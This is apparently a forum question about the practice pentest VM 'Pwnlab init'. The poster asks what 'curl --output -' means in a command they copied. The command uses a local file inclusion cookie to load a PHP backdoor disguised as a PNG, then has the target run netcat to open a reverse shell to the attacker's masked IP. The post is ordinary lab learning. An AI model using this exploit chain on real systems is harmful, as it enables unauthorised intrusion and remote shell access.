I used the below curl query while doing a practice pentest virtual machine, called Pwnlab init. The purpose of the query is to cause the index.php page to access the png file, which is actually a disguised php backdoor script, and then cause the machine being attacked to issue a netcat command to connect to my attacking machine. I knew to use this query only after researching how others were able to successfully complete the virtual machine. I understand the entire query, except for the first part curl --output -. Can anybody help me with what this part of the query does?
curl --output - -b lang=../upload/6a8c0c37efded4d620a5c59990f07b90.png \
http://xxx.xxx.xxx.xxx/index.php?cmd=/bin/nc+-e+/bin/sh+xxx.xxx.xxx.xxx+xxxx
